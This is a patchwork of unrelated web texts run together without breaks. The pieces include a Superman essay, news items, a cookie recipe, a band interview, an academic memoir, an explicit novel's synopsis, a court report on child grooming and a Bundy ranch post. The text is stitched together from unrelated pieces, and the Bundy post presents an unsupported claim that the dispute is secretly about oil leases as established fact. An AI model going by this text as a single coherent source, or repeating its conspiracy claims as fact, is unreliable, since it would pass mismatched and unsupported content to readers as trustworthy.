But it is this weakness, this morality he possesses and they do not, which ultimately decides who will win. Superman stands against eugenics, he stands as a shield to protect the weak and the poor against the stronger who look to mistreat or kill them for their own purposes. In the climactic battle of Man of Steel, we see the two ideals literally wage war against each other. Zod looks to destroy humans and create his new Krypton society, much like the eugenicists of the 20th century; while Superman fights to protect those deemed unfit to live, he shows to Zod, and to the readers of the comics from 1938 onward to Man of Steel, he is the protector of the weak and the poor. Much like Moses, and much like Christ, he was sent to protect a people small in number, to heal and save the sick and needy from evil. With Zod's death, he condemns the remnant of Kryptonian society to Oblivion; and our own history teaches us the brutality that idea births in nations. One look at Nazism and Communism in Russia, and the attempts at eugenics in America from the 20th century and the moral atrocities committed then should be enough to quell any resurgence of the abased thinking that is eugenics.
Eugenics is the anti-declaration, the anti-human, pro-perfection at any cost movement. In history and in fiction we see the devastating cost to morality and humanity by this ideal. These examples can serve as warnings, something we can take heed of when the idea returns, as it has with the recent neo-Nazi/al-right movement. Although he is the “Übermensch”, he does not use that status to destroy the weak as the Nazi's attempted; he uses it for the opposite, for good. He saves people from floods and fires in Batman v Superman, something which resembles our own civilians risking their lives to save those from the fires in the northwest and the flooding in the south. By dying to save a world who hated him, he displays the sacrificial death of Christ. He mirrors countless men and women who have sacrificed their livelihoods, and their own lives to save others. He is a standard-bearer, a beacon of hope to look toward by those who are in need of it. Instead of strength through physical and material power, Superman shows us the better way: moral strength through sacrifice.
The destruction of Krypton is a haunting prediction of what happens when unhindered progress is unbridled by morality. Krypton society had progressed beyond all others, but with morality gone, there was no one to ask “why?”
Superman reminds us that value is not based on how much a person makes, or what they can contribute to society in a materialistic way, he reminds us, as does the Declaration of Independence, that, “We hold these truths to be self-evident, that all men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these are Life, Liberty and the pursuit of Happiness.” Superman fights for Truth and Justice. And truth and justice are universal.
New research from MIT reckons that robots controlling human tasks in manufacturing is not only more efficient than flesh-and-blood middle-management, but preferred by people that do the work too. Automation in the manufacturing process has been around for decades, but the new study aimed to seek out the sweet spot where human workers were "both satisfied and productive."
"We discovered that the answer is to actually give machines more autonomy, if it helps people to work together more fluently with robot teammates," said project lead Matthew Gombolay. The study was composed of groups of two humans and one robot, working in three test conditions. One had all tasks allocated by a human, another where all tasks were allocated by the robot and the final scenario had one human allocating tasks to themselves, while the robot allocated tasks to the other meatsack. Researchers found that when the robot was on top, not only was the group most effective, but the human workers also preferred it, saying that the robot's choices apparently "better understood them."
At what level are technology decisions made? Do the teams decide what tools and languages are used, or is it the architect, directors, the CTO or someone else? Assuming the team doesn't make the decision, what happens if the team disagrees with the decision maker?
What kind of hardware are developers given, and who decided that this was the ideal setup? If I want to reformat my Windows box and run Ubuntu, do I have that freedom?
How much freedom am I given to customize my work-space? If my teammates and I want to convert our cubes into a common area with pairing stations, what kind of hurdles are we likely to encounter?
How does the organization chart look? If there are 2 levels between me and the CTO, do I need to follow the chain of command, or am I able to go directly to the CTO if I feel it's appropriate? What about the CEO, am I able to get 10 minutes of the CEO's time?
What don't you like about working here?
If you've ever read tips on interviewing then you know it's a good idea to have questions ready to ask someone who's just interviewed you. If you're not good at remembering questions under-pressure you should write down a few and take the note with you.Most of my important questions are answered in the interview: What does your software process look like, what tools do you use, etc. However, I have a few questions that don't usually come up during the normal course of an interview.The last one is really my favorite. People actually tend to be pretty honest about what they'd like to change at their organizations.Obviously, the answers are going to vary largely by the type of organization you are looking to join. If you're interviewing at Google, it's probably not easy to get on the CTO or the CEO's schedule. So, I don't think there's right or wrong answers, but in context the answers can help guide whether the organization is a good fit for you.
By
The kids were on Spring Break last week which meant getting less work done for me and more time in the kitchen. I actually was in the mood to bake and made some cute flower sugar cookies. I made quite a bit of dough, so I was able to make some good size cookies. When you add Nutella on your sugar cookies once they are cooled, they are delicious.
Below is a easy recipe for rolled sugar cookie dough:
5 from 1 vote Print Rolled Sugar Cookie Recipe + Nutella Author ThisMomCanCook.com Ingredients 5 cups all purpose flour
1 1/2 cups butter - room temperature
4 eggs
1 tsp vanilla extract
2 tsp baking powder
1 tsp salt
2 cups sugar Instructions In a large bowl, cream butter and sugar. Add eggs, vanilla, baking powder and salt until blended. Slowly fold in flour and knead until it becomes a dough consistency. Cover and chill in fridge for at least an hour. Roll about 1 inch thick and cut with cookie cutters. Bake at 400 degrees for 6 to 8 minutes. For larger cookies, back 10-11 minutes until lightly golden. Remove from oven, cool and frost with Nutella!
These cookies are good alone, but incredibly better with Nutella.
Enslaved: The “In Times” Interview
Photo by Thor Broedreskift
The Norwegian black metal band Enslaved have always had a progressive element to their sound. Although their earlier material is raw and primal, the music has distinct sonic elements that set them apart from others in the genre. Beginning with the 2001 album Monumension this element began to become far more pronounced. With the help of some lengthy melodic jams and ethereal keyboard passages, Enslaved began to be perceived as the sort-of “Pink Floyd of black metal.”
Their latest album In Times brings them closer to this idea than ever before. The album is comprised of six epic tracks that use equal amounts of extreme abrasiveness and delicate melodies. During their last pass through Toronto (the first since they were waylaid by a blizzard in late 2013) I sat down with Ivar Bjørnson (guitar/vocals) and Grutle Kjellson (vocals/bass) for an in-depth interview about how they have arrived at their current sound, the role Norse culture plays in their music, and how the post-nineties perception of black metal in Norway has helped their profile at home.
Shot and Edited by Aaron Mandel at Boke Productions
Enslaved are currently on tour in North America with Between the Buried and Me with two dates in Canada: December 10th in Toronto at the Danforth Music Hall, and December 11th in Ottawa at the Bronson Centre. In Times is available now on Nuclear Blast Records, and you can listen to the track “One Thousand Years of Rain” here.
With no real possibility that US sanctions against North Korea will have any real teeth, since the US doesn't have any trade or diplomatic ties to start with, the struggle to figure out what the US could conceivably do to North Korea has mostly centered on military attacks.
But there are other acts of war possible, and some in the US seem to be advocating a naval blockade of the whole of North Korea, figuring that would be one way to ensure that there's literally no trade possible.
Blockading an entire country that size would be no msall task, despite the large amounts of US naval assets in the area. That North Korea also has direct links to both China and Russia, their main trading partners, also limits what a blockade could really do, beyond being a declaration of war.
North Korean officials are warning that it would be an act of war, which isn't really debatable, and are also warning they'd retaliate against any such move, warning it would be a dangerous step toward a nuclear war.
That's a serious concern irrespective of what act of war the US chooses to escalate the situation in North Korea, as analysts have repeatedly warned that there is no such thing as a “limited” war with North Korea, and anything would quickly escalate into a full-on nuclear exchange.
Trump Administration officials have continued to suggest military means are their preferred choice to anything, except for a total North Korea surrender. Secretary of State Rex Tillerson is the only one who suggest diplomacy as a strategy, and every time he does, he's publicly rebuked by someone else in the Administration.
Last 5 posts by Jason Ditz
It finally happened.
After scoring several incredible goals this season, Sebastian Giovinco has finally taken home AT&T Goal of the Week honors.
The Toronto FC superstar curled in a beautiful free kick against Orlando City SC last Wednesday night that banged off the post and into the back of the net.
The goal garnered 41.21 percent of the vote, outpacing the field by almost 20 percent. Vancouver Whitecaps attacker Cristian Techera finished in second place with 21.94 percent of ballots cast.
Giovani Dos Santos of the LA Galaxy finished third, DaMarcus Beasley of the Houston Dynamo came in fourth and Toronto FC's Michael Bradley finished fifth.
1. Sebastian Giovinco (TOR) - 41.21%
2. Cristian Techera (VAN) - 21.94%
3. Giovani Dos Santos (LA) - 13.87%
4. DaMarcus Beasley (HOU) - 13.62%
5. Michael Bradley (TOR) - 9.36%
How far would you go for science? No matter what your answer, there is an elite cadre of scientists who have dedicated their lives to going a lot further. Meet the sperm collectors. They're doing it to make the world a better place.
Why, Why, Why?
At best, this procedure is going to result in a war story told to younger scientists. At worst, it's going to end in a once starry-eyed intern quietly crying in a corner. Why it something like this necessary? Surely the entire point of evolution is that animals can do this on their own. Thanks to us, it has become a little complicated.
Advertisement
For one thing, agriculture got involved. This includes industries like dairy, in which cows, which produce milk, and bulls, which produce nothing, are not of equal value. Hens and roosters skew the same way, in terms of usefulness of the sexes. Farms aren't always willing to support freeloading males to sexual maturity simply to preserve mate parity. When the time comes to make the next generation, in the absence of males, they need a supply of genetic material – usually from a dealer. Dealers also supply to farms that just want better genetic stock, sperm that's guaranteed to have no diseases, and even sex-selected sperm. Even when enough males stick around, as with turkeys, generations of breeding them to the tastes of the public has played hell with their physiology. Some species of commercial turkey can't breed naturally, due to their large breasts. In some species, males get so big that females collapse under their weight.
Agriculture looks like a sure bet for species survival, but it's fickle. Navajo Churro sheep were introduced into America half a millennia ago. They were the standard for wool production for centuries. Before industrialization, they numbered in the millions. When it was discovered that their wool was unfit for industrial purposes, the population plummeted. Nowadays, they're seen on a few farms, and in zoos that preserve “heritage breeds.” In the 1970s, when the conservation effort first got started and people seriously thought the sheep might be wiped out, scientists and conservationists stockpiled sperm as a genetic reserve. The same principle applies to more well-known endangered species all over the world.
Advertisement
And then there are the labs and the zoos. Sometimes, scientists just need a semen sample. Sometimes they need a supply for directed breeding. And occasionally, they just need cooperation. Bonobos are well-known as the kinder, gentler alternatives to chimpanzees. They're well-known for being one of the most sex-centered primates out there. (The only primates that beat them on that score are the ones reading this article. Shame on you.) What they're not particularly well-known for is the demands of both males and females of a little gesture of reassurance and goodwill before they participate in laboratory experiments. This is one of the few areas in which the animals are much more willing to donate than the researchers are to receive.
How, How, How?
The process that unfortunate bonobo researchers go through is hardly a mystery – much as we might wish it were. Other practices are more involved, but only just. Zookeepers tend to do a similar job when they want to breed two animals that, for reasons of sexual inexperience or difference in temperament, wouldn't get along naturally. For some species, the process is gradual. Elephants are slowly accustomed to a delay in a certain narrow box-like structure on their way to their food or their shelter. Keepers get them more accustomed to contact until it's just another routine. Other species get a more abrupt treatment. Crocodiles are anesthetized and, I quote, “tickled,” to get semen samples.
Advertisement
Those scientists have it easy. At least they get gloves, and hands are relatively easy to wash. Unfortunate ornithologists have a tougher time of it, both physically and psychologically. Birds tend to imprint on whatever raises them, and rare birds that are raised by humans are not interested in others of their own species. In their minds they are human and should mate with a human. The researchers don't agree, but they are willing to compromise a lot to save endangered species. To collect the semen, they are given a hat with a sturdy and liquid-proof brim. The birds have to bond to the hat and the keeper over time. This does not just involve spending time with the bird. The keeper has to mimic the calls of the bird's species, as well as the courting behaviors. Essentially, they're dating the bird for weeks, or even months. Eventually they form a pair bond, and the hat comes into play. The bird will mate with the hat, and the semen will collect in the brim.
It's not surprising that some researchers would wish to skip these steps, and so it's to their credit that an easy solution is no longer regularly used. One of the quickest ways to collect sperm, from mammals at least, was an electric shock. Inserting a metal probe into the animal's rectum and delivering a shock triggered involuntary ejaculation, and the sperm was collected quickly. While the method might have left the handler's dignity intact, it caused trauma and occasional injury to the animal.
Advertisement
Popular nowadays are surrogate females. It turns out that male animals, especially farm animals, are not picky when it comes to how their mates look. The surrogate is pretty much just a leather-covered plank with a strategicly-placed opening. Different companies make this for different animals. In order to train the males, all the farmer needs to do is splash the dummy with semen, male saliva, and female urine. (They're also advised to make sure that the dummy is sturdy and has no sharp edges, so as not to spook young males.) After that, all they need to do is fit the opening on the dummy with a collecting flask or a “nonpermeable latex reservoir,” the phrasing of which, given all the euphemisms I have used during this article, I can hardly criticize. One cattle sire company brags that it can, using this method, collect nearly two thousand gallons of semen per year.
No, No, No!
Few people would head their resume with these qualifications, but without the techniques outlined above, the world would be a different place – and not just because our turkey would have less white meat. Some would argue that farming would be better if the animals involved were not so far removed from natural evolutionary processes. They might be right. Still, semen collected by scientists, instead of comely females of the same species, has helped some species back from the brink and increased the genetic diversity of others. And this may not be the last time it makes the difference.
Advertisement
The Audubon Frozen Zoo has “genetic material,” from endangered animals the world over. They've got semen from the sandhill crane to the Sumatran tiger, representing not only hopes for the future but what have to be hilarious stories from the past. (The sandhill crane is four feet tall and had to have mated with one hell of a hat.) A little indignity may, one day, prove to have kept an entire species from going extinct. In the meantime, it allows some human species to get a little perspective on how animals are handled – and on the demands of their own jobs.
SOURCES: Agriculture Proud, NBC, ABC, Bonobo Handshake, Zoo Story, Queensland Department of Agriculture, Navajo Sheep Project, Essentials of Avian Surgery and Handling , Frozen Zoo.
Advertisement
Sheep Image: Just chaos
Bonobo Image: Pierre Fidenci
Owl Image: Anton Bielousov
Sandhill Crane Image: USFWS
Image caption The extra "I" was painted over as a temporary measure, the car park managers confirmed
Workmen have corrected the spelling of road markings in Cambridge by covering the offending letter with black paint.
The "20 minuites max parking" sign was painted at an NCP car park at the railway station about two years ago.
Last week contractors arrived, but instead of removing the extra "i" in "minutes", they repainted it.
It has now been painted black. An NCP spokeswoman said: "Everyone involved has committed to playing Scrabble in their lunchtimes as spelling revision."
Image copyright Steve Buckley Image caption Workmen arrived last week but instead of correcting the error, they painted it a brighter yellow
Steve Buckley, who works opposite the station, photographed NCP contractors arriving on Thursday.
He said he thought they had come to correct the original error, but instead repainted it, making it brighter and more noticeable.
"I've seen what they've done now, it's just a black stripe over the errant "i", but I guess it's slightly less obvious," he added.
The NCP spokeswoman said the newly blacked-out letter "i" was a temporary measure and contractors would be returning to repaint the whole word - correctly.
"You don't think you actually have to check whether they know how to spell 'minute'," she said.
"We'll be testing them from now on."
The NCP would check the spelling on its signs and road markings in the future, she added.
6 Min read time Share:
Anne Fausto-Sterling (left) and Debbie Weinstein / Pembroke Center
Prologue: In national politics these days it sometimes seems as if we re-litigate battles won decades ago, and at times I wonder whether those 20 or 30 years younger than I even know what happened back in the day. So here are some snippets. Although specific to my time at Brown University, similar things happened in the same time frame at institutions of higher education all over the country. So, dear reader, yes, do generalize.
1968: As a graduate student in biology, I was the first in my department to wear pants instead of dress, heels and stockings to the lab. I refused to serve tea at the reception for our guest speakers because the rule that the male grad students showed the slides (anyone remembers slide projectors?) and the few female grad students served the tea and coffee seemed wrong to me. Take turns at these jobs, I said. Let the women learn how to operate the technology and the men how to pour without spilling.
1971: Now I'm a postdoctoral fellow. My department chair disinvites me to lunch with a prominent visitor who had the potential to positively influence my career in biology. The reason? They planned to eat at the University Club which did not admit women nor allow them on the premises. It took another decade for the University President to refuse honorary club membership and ban the conducting of university business at the club.
1971: Five of us, all assistant professors are huddling in the Faculty club for lunch. Éminence(s) grise(s) wander by and ask if we are plotting against them. This seems amazing since there are five of us and hundreds of them. We are in the lowest ranks and they the highest. But also, yes, we were. We were plotting how to bring more of us into the professoriate and how to keep some of us there through tenure and beyond.
Plot 1 (1971–1977) Get more women: first, we thought, get our facts straight. How many of us were there really? Oh, nobody knew. The provost and dean did not keep track of such things. No need to. We are objective academics. We don't “see” gender, or race either, for that matter. Why count? The only way we could find out was by going to each department and asking if there were any women working there. Our one feminist, and female, dean helped us out by getting her secretary to call. Here are some of the numbers from those early days: 3 full professors, 15 assistant professors, a larger number of instructors and non tenure-track women for a total of maybe 75. Overall faculty size was about 400. The above numbers are from memory. The reports we wrote yearly in those days are in Brown's John Hay Library for anyone who wants total accuracy.
The plotting thickens: We learned that mathematician and former dean of Pembroke College, Nancy Duke Lewis (1910–1961) had left money to endow a chair designated for a female professor. But the university had just plowed the money back into general funds. When confronted, the then Provost said there wasn't enough money in the endowment to hire a professor. When confronted again, he said the terms discriminated against men! Through the efforts of powerful Pembroke alumnae we raised enough money to complete the endowment. Through tough negotiations, we figured out a non-discriminatory wording (“a senior scholar in any field who is distinguished in an area of gender studies”), and in 1980 we hired Joan Wallach Scott as the first Nancy Duke Lewis Professor.
The plotting leads to a game-changing lawsuit: Assistant Professor of Anthropology Louise Lamphere was denied tenure in 1974. She filed suit in 1975, and in 1976, with a class action lawsuit under active litigation, I became one of a cohort of 5 women granted tenure, more than doubling the number of tenured women at Brown. But, we were assured, our promotions had nothing to do with the suit. Louise won that suit and the university operated under a court decree for 15 years, while it cleaned up its act. It took many more years of negotiation with administration and faculty governing groups to incorporate fair hiring, retention and promotion rules into its personnel practices so that finally, we could take a stab at this fairness thing without court supervision.
Plot 2 (1972–Present) The Women's Studies Plot: We heard, “That can't be a serious topic,” “there is no scholarship about women,” “students won't be interested,” “It's just a fad,” “We don't teach basket-weaving at Brown.” A group of us offered the first women's studies course at Brown as an extra, i.e. over and above our already full time teaching duties. I figured if I didn't mention it to my department and I did all my departmental obligations without complaint I could get away with it as an extra load. I wonder if an assistant professor in today's corporate university could help to start an initially despised field of study and successfully fly under the radar long enough to get tenure? Today we have a Gender and Sexuality Studies Program, an undergraduate major, and very modest monetary support from the university.
Plot 3 (1971–Present) Child care: How could women take a full role on campus without a safe and affordable place for their children. None of the 3 existing full professors had children, but the new generations wanted a more complete life. Sorry to say we failed on this one. This year (2013) I attended a meeting at which yet another report on how to provide child care for Brown staff and Professors was discussed. Good will gesture got approval, but not a commitment to develop an affordable center for our community. Forty years, but still no positive result. I guess there is still some unfinished business to pass on to the next gen(s).
Plot 4 (1974-mid 1990s) Develop and Enforce Rules Against Sexual Harassment: This piece of the puzzle seemed to take forever, but finally fell into place after some especially egregious behavior led to parental complaints and the firing of two faculty members, one who actually had tenure.
1972: Avuncular senior historian invites me to lunch in an evident effort to encourage me. His opening gambit: there were no women scientists before your generation because of all those barriers. But now the roadblocks have been removed, there will be many of you (and only yourselves to blame if you fail). He meant well, and he was an historian, but could that really be true? Margaret Rossiter's Women Scientists In America didn't come out until 1982. In the meantime I started noticing and collecting snippets—on Beatrix Potter who pioneered mycology before she wrote Peter Rabbit. On Nettie Stevens, who discovered the role of the Y chromosome in sex determination, on Maria Mitchell an astronomer who discovered a comet and many more. What truly amazed and energized me was that there were lots of women who scientifically explored the world despite the barriers.
2013: Thoughts some 40-odd years later. In 2009, Brown recognized some of my accomplishments by honoring me with the Nancy Duke Lewis Chair, which, after a short five years I relinquish when I retire in 2014. I am gratified by that. And the exhilaration of struggle and pride in social accomplishments is strong. But so too is the hurt of rejection and marginalization. I think for my generation such pain lurks just under the surface. Pioneers get wounded; that's all. Still, these days I get to travel all over the world and it is a thrill to work, however briefly, with women in Turkey, or France, or Sweden or elsewhere as they bend feminism and gender studies into shapes appropriate for their national and university contexts. Largely due to the force of the Civil Rights Act, feminism, and viewers like us, when it comes to equal representation of women the United States leads the pack, in pretty much all sectors, including academia. But of course, leading the pack still doesn't mean we have crossed the finish line of equality.
CUNT BY STEWART HOME - SYNOPSIS
The narrator of Cunt is David Kelso. He's a cunt in search of cunt. He's also a writer who claims to be so lacking in imagination that his fiction isn't fiction. Kelso is completing a trilogy in which he describes tracking down and shagging the first thousand women he bedded. Despite boasting that he is completely uncreative, Kelso dreams up some seriously Machiavellian scenarios in order to get into the knickers of various women he hasn't seen for years. Kelso is also disarmingly candid about the fact that he sometimes fakes his results. Such dissimulation raises serious doubts about Kelso's reliability as a narrator. Cunt is simultaneously David Kelso's journal and a post-modern variant on one of the oldest genres of prose fiction, the picturesque novel. Kelso's wanderings take him from London to East Anglia and from there to Finland, Sweden, Estonia and the highlands and islands of Scotland. Regardless of whether the backdrop is the beautifully preserved medieval city of Tallinn or the Callanish standing stones, Kelso's primary preoccupation is pussy. However, the relentless sexual action is occasionally frozen so that the narrator can reflect drunkenly on the philosophy of Deleuze and Guattari or literary obsessions that encompass writers as diverse as Thomas Nashe and George Gissing. While doubling and repetition are a significant feature of Cunt, they are used primarily for humorous effect. Incidents on the road occur in a definite sequence but despite a shock ending, the novel is not strongly plotted. Kelso is a soak and after a bender in Finland he loses the plot completely for a couple of chapters. He can recall sexual encounters with teenage girls, three in a bed romps with older women and even a murder- but finds it difficult to place these events in the correct order or any meaningful context. Rather than worrying about this, Kelso simply fucks his way back to the British Isles. Cunt can be read as pornography, satire, travelogue or a combination of all the above and much else besides. Cunt was published by The Do-Not Press in 1999 and is currently out of print. A print on demand version of the book may be available in the near future. Check the 'Buy' section of this site! Cunt as a news story Bibliography
43 printers refused to print this book. When one finally agreed it was under the condition that the word 'Cunt' did not appear on the spine (a different printer did stickers for the spine - they were not set up to do books) and that the word 'Cunt' was not typeset on the cover (they agreed to an identity bracelet with 'CUNT' on it as a concession).
Cunt in Finnish translation.
London: Just one rasher of bacon a day can damage a man's fertility, while eating a portion of white fish such as cod or halibut every other day can improve it, researchers have suggested.
The study by Harvard University on 156 men in couples suffering problems conceiving examined their diet and the size and shape of their sperm.
A study has found that bacon and other processed meats are bad for men's fertility Credit:Fiona Morris
Researchers found that men who regularly ate processed meat had significantly lower amounts of normal sperm, compared with those who limited the amount of foods like bacon, sausages, hamburgers, ham and mince.
On average, those who ate the equivalent of less than a rasher of bacon a day had 30 per cent more normal sperm than those who ate higher quantities of processed meats.
So much contradicting info out there these days. I just hope i'm on the right side.Published on Apr 11, 2014So here it is in a nutshell: ClivenBundy has been battling the US government for 20 years for the use ofhis family's land, this man's "one-man range war" may soon come to abloody end. Heavily-armed federal agents have surrounded the ranch andhave decided that the cattle on the land are "trespass cattle" andshould be removed from the private land. Cliven Bundy, since 1993 hasrefused to pay fees to the federal government for the right to raisecattle on land his family has ranched since the 1870s. After years oflegal quarrel, the Bureau of Land Management or BLM seized a federalcourt order to have Bundy's almost 1,000 cattle procured. Bundy says thegovernment is taking the matter quite seriously, arming the agents withmilitary-style weaponry. Carol Bundy, Cliven's wife, stated thathundreds of armed BLM and FBI agents have amasse around their property,helicopters circle the area, and nearby roads remain off limits. As ofMonday, the government agents and their contractors have snatched 234 ofthe 908 cattle. The removal will cost the federal government as much as$3 million, an exorbitant reach for such a small matter. Dave Bundy,the son of Carol and Cliven, was arrested for taking photos of stateroad 170, which had been closed by BLM. Dave was aggressively detainedby officials for "failure to comply with multiple requests by BLM lawenforcement to leave the temporary closure area on public lands."Thefamily said that five agents took Dave and roughed him up pretty good.BLM defends their actions in removing the "trespass cattle" as necessarysince Bundy did not move the cattle after refusing to pay suspiciousback fees for use of the land. Supposedly, Bundy owes around $1 millionin fees, but the family says they owe close to the sum of $300,000.TheBundy's said their appeals to local and state law enforcement havefallen on deaf ears. "Our sheriff says he just doesn't have authority,our governor says he doesn't have authority, and we're saying, why arewe a state?" asked Carol. The BLM has further displayed there abuse ofpower by cordoning off "First Amendment Areas" as designated spots wheredemonstrators are allowed by the dictatorial BLM to amass and grousethe action. One may think, "Why are the BLM so aggressive in theirappropriation of the land and cattle of the Bundy's land? Well, it sureis not about protecting "endangered tortoise" or the fact that theBundy's owe money, it's about--wait for it--oil! According to NaturalNews, the BLM is actually in the business of raking in millions ofdollars by leasing Nevada lands to energy companies that engage infracking operations. What's also evident is that oil has been found innearby areas and possibly even within the Gold Butte area itself.Standard practice for the United States government is to bring armedsoldiers to an oil dispute. Oh, you want proof? Please Google OperationIraqi Freedom for an example.
MUMBAI: A US district court judge ruled on Friday that the Trump administration cannot delay an Obama-era immigration rule, which enables eligible foreign entrepreneurs to temporarily stay in the US to nurture and grow their startups. America's doors are open again to foreign entrepreneurs under the International Entrepreneur Rule (IER), which in common parlance is referred to as the ‘startup visa' route.Finalised by the Obama administration, IER enabled qualified (based on prescribed criteria) entrepreneurs to obtain immigration ‘parole'—that is to temporarily enter and stay in the US despite not having a visa or green card. Commonly, IER is known as the startup visa , but it is actually a permit to foreign entrepreneurs to stay in the US for two and a half years with the possibility of a similar extension. The IER was to come into effect from July 17, 2017; however, less than a week before that, the US Department of Homeland Security announced that it would be delayed to March 14, 2018 and that it intended to rescind the final rule.As was reported by TOI in its edition dated October 6, this action of the DHS at the behest of the Trump administration prompted a group of entrepreneurs including some from India, along with the US-based National Venture Capital Association (NVCA) to file a lawsuit in the US Federal Court.The plaintiffs argued that because the DHS did not solicit advance comments from the public on the delay, it violated the clear requirements of the Administrative Procedure Act. Hardships that the delay caused to the plantiffs were also pointed out. In addition, they contended that the US would miss out on the economic activity that would have been generated as result of these new businesses.The order pronounced by district judge James E Boasberg, on December 1, a copy of which is available with TOI, now compels the DHS (the Citizenship and Immigration Services wing falls in its ambit) to begin accepting applications from foreign entrepreneurs.Paul Hughes, lead counsel for the plantiffs and partner at Mayer Brown, a law firm, told TOI: “The court's order confirms that while American administrations may change, basic legal requirements ensure agency transparency, guarantee public participation, and prevent reactionary, ill-considered policy changes. The court has held that the Trump administration's delay of the IER was unlawful.”The stakes were high for all foreign entrepreneurs and US investors and not just the plantiffs. Traditionally the US has been known to provide a conducive ecosystem for startups. To illustrate, a 2016 study by the National Foundation for American Policy pointed out that immigrants have started more than half (44 of 87) startups in the US that are valued at $1 billion or more. Fourteen of these startups were founded by Indians.As the recent order points out, since the US does not have any dedicated work visa for foreign entrepreneurs, the DHS had promulgated the IER to encourage them to set up and develop startup entities with high growth potential. Attracting foreign entrepreneurs would benefit the US economy through increased business activity, innovation and dynamism was the basis of formulating this rule.In an official statement, Bobby Franklin, president and CEO of NVCA, referred to the order as a significant victory for talented foreign entrepreneurs, the entrepreneurial ecosystem and the US economy. “The facts speak for themselves—the US economy has long thrived on the contributions and innovations of immigrant entrepreneurs and we are a better country as a result,” he said.“The order requires immediate implementation of the IER. We anticipate that qualified entrepreneurs will immediately begin applying for parole, so that they can get to work in the United States, build new businesses, and create new jobs for the economy as a whole,” summed up Hughes.The association had repeatedly urged the Trump administration to maintain the IER and expeditiously implement it. NVCA's members were harmed by the delay in IER. These members have invested, will invest or would consider investing in startups that have founders who could apply for entry and stay in the US under IER. The delay puts these investments in jeopardy and chills potential future investments.Omni Labs, which provides digital platforms to its customers for data visualisation and analytics, had set up a US entity in 2015. However, two of its founders—Nishant Srivastava and Vikram Tiwari (both Indians) who would have otherwise qualified under IER, were not able to operate from the US. Thus an office had to be set up in Canada. In addition to operational challenges and increased costs, as the founders were not based in the US it could also result in difficulties in obtaining funds from US investors the company had contended. Similar operational difficulties, including of not being able to launch their digital platform in the US and challenges relating to obtaining additional US investments were also expressed by Indian-origin brothers Atma and Anand Krishna, co-founders of LotusPay.1. A new startup entity must be set up in US within 5 years of the application2. The foreign entrepreneur can remain in the US for up to 30 months to grow his startup. A further stay of up to 30 months could also be granted3. The applicant is required to have an ownership of at least 10% in the startup and also play an active role in the business4. The startup needs to have substantial potential for rapid growth and job creation5. A minimum investment of $250,000 is required from qualified US investors or at least $100,000 in grants from US government entities
President Obama's newly decorated Oval Office
After the White House released photos of the newly renovated Oval Office late last month, the Explainer noticed something a little bizarre: There was no computer on President Obama's desk, or any paperwork, either. Does Obama actually work in the Oval Office?
Not most of the time. The president conducts briefings and holds staff meetings in the Oval Office, but it's used primarily as a ceremonial space. Obama does much of his day-to-day work—such as editing speeches and reviewing papers—in the President's Study, located off the Oval Office, and in the Treaty Room, on the second floor of the White House. Many recent former presidents—including both Bushes, Carter, Ford, and Johnson—chiefly worked out of the study as well. The last president to use the Oval Office regularly for desk work may have been John F. Kennedy, who would go there after hours to record the day's events for what would, presumably, have become his memoirs.
The desk in Obama's Treaty Room, unlike the Resolute desk in the Oval Office, is piled high with paperwork. The room also contains a computer , a printer , and a television . Despite these office amenities, it's unlikely that Obama uses a computer regularly in the White House. As the Explainer noted last year, previous presidents, including Bush and Clinton, went without computers and e-mail in order to avoid the Presidential Records Acts of 1978, which requires commanders-in-chief to archive their correspondence and make it public. (The PRA does not include a section on e-mail, but the act's broad definition of a presidential record has been interpreted to include electronic communication.)
Bonus Explainer: Why is the Oval Office oval? It's supposed to recall the elliptical salon in George Washington's temporary presidential house. Washington thought the oval design encouraged guests to stand around him in a circle. He could then bow to greet each guest in order and from about the same distance.
Got a question about today's news? Ask the Explainer.
Explainer thanks David Coleman of the Presidential Recording Program at the University of Virginia and Gleaves Whitney of the Hauenstein Center for Presidential Studies.
Like Slate and the Explainer on Facebook. Follow us on Twitter.
The poet's author, Calvin Trillin.
Esteemed food writer and humorist Calvin Trillin is getting grilled for a poem in this week's New Yorker that tackles the issue of … Chinese food, or, more specifically, how complicated it's become for serious food lovers to keep track of all the different types of Chinese food that are available. Called “Have They Run Out of Provinces Yet?” — maybe not the best title — it begins:
Have they run out of provinces yet?
If they haven't, we've reason to fret.
Long ago, there was just Cantonese.
(Long ago, we were easy to please.)
But then food from Szechuan came our way,
Making Cantonese strictly passé.
Szechuanese was the song that we have sung,
Though the ma po could burn through your tongue.
Then when Shanghainese got in the loop
We slurped dumplings whose insides were soup.
Then Hunan, the birth province of Mao,
Came along with its own style of chow.
So we thought we were finished, and then
A new province arrived: Fukien.
.@NewYorker the answer is YES soon the world is going to run out of provinces for basic whites to gaze on and consume and toss to the side — Eddie Huang (@MrEddieHuang) April 6, 2016
I wrote this in 45 minutes cause that's all Calvin Trillin gets "Have They Run Out of Pumpkin Spice Yet?" @NewYorker pic.twitter.com/rFNnMreCIN — Eddie Huang (@MrEddieHuang) April 6, 2016
Has Calvin Trillin written a poem utilizing the syllable "Cruz" yet? Request here. — Joyce Carol Oates (@JoyceCarolOates) April 6, 2016
Asian-Americans are understandably tired of being the punchline of every food joke, but Times restaurant critic Pete Wells and others say Trillin should get the benefit of the doubt here:
Before we beat Trillin to a pulp let's remember there are professional food writers who think "Asian food" is a meaningful phrase. — Pete Wells (@pete_wells) April 6, 2016
Also this would be a good moment to go read Trillin's back catalog including his coverage of the civil rights movement. — Pete Wells (@pete_wells) April 6, 2016
:whispers: Calvin Trillin may have miscalibrated his tone but I'm pretty sure he's making fun of white people — David A. Graham (@GrahamDavidA) April 6, 2016
That Trillin poem is mostly about FOMO and stress about keeping up. His chow mein nostalgia is silly; he prob thought it was self-effacing. — John Birdsall (@John_Birdsall) April 6, 2016
And yet other critics understand that this is a self-aware parody, but they take issue with the technical aspects of the poem itself. Three Asian-American writers have submitted their own “rhyming poem” about Chinese food:
[The NYer, Guardian]
Elliott McDermott, 19, claimed three victims after befriending the youngsters on the social networking site then making arrangements to meet them.
McDermott took the virginity of one 14-year old girl after offering to buy her alcohol and cigarettes from an off licence in return for sex.
Today police branded him ''every parents the worst nightmare'' after he admitted two charges of rape, three sexual assaults and three counts of grooming. He was also ordered to sign the sex offenders register indefinitely.
McDermott began grooming his victims after they became Facebook friends and began swapping ''unremarkable'' messages, Minshull Street Crown Court in Manchester was told.
His first victim was 12-years-old when he befriended her through Facebook. After sharing several messages over the internet they exchanged mobile numbers and he arranged to meet her at a house in Salford.
Between July and August last year. McDermott went to the victim's house and while there raped the young girl.
